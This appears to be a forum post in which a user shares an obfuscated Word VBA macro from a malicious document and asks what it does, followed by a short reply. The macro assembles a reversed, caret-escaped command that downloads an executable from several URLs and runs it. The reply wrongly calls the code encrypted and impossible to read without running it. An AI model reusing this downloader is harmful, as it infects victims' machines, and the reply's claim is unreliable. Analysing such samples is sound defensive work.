My other half was sent a piece of malware in MS word VBA. The document was opened, editing enabled and the Trojan was missed by the anti virus for some reason.
I'm 99% sure the system has been cleaned and the there are no lasting effects, however I'd like to understand what the code was trying to do so I can be 100% sure.
What I have managed to translate is beyond my skill.
This is the original function from the VBA:
Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) = MidB(iOGKfiB, 537, 348)
isfqZj(2) = Mid(pjzflRs, 58, 796)
isfqZj(3) = MidB(iOGKfiB, 537, 348)
isfqZj(4) = Right(LCsbFFjF, 428)
Dim HCOVDH(2)
HCOVDH(0) = MidB(iOGKfiB, 537, 348)
HCOVDH(1) = Left(JErht, 810)
Dim YuAhz(5)
YuAhz(0) = Left(JErht, 810)
YuAhz(1) = Mid(pjzflRs, 58, 796)
YuAhz(2) = Right(LCsbFFjF, 428)
YuAhz(3) = Mid(pjzflRs, 58, 796)
YuAhz(4) = Mid(pjzflRs, 58, 796)
vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
Dim kmYzM(4)
kmYzM(0) = MidB(iOGKfiB, 537, 348)
kmYzM(1) = Mid(pjzflRs, 58, 796)
kmYzM(2) = Left(JErht, 810)
kmYzM(3) = Mid(pjzflRs, 58, 796)
Dim hNkzi(5)
hNkzi(0) = Mid(pjzflRs, 58, 796)
hNkzi(1) = Left(JErht, 810)
hNkzi(2) = Left(JErht, 810)
hNkzi(3) = Mid(pjzflRs, 58, 796)
hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function
It's encrypted code.
There's no way to tell what it's doing without running it far enough to have it decrypt itself.
When run, the strings will be converted back into commands of some sort, at which point you can tell what it's going to do.
If you want to examine it, spin up a windows Virtual Machine (you can get them free from Microsoft), install Word and you can step through the code using the Debugger, which is in the "Macros" menu in Word.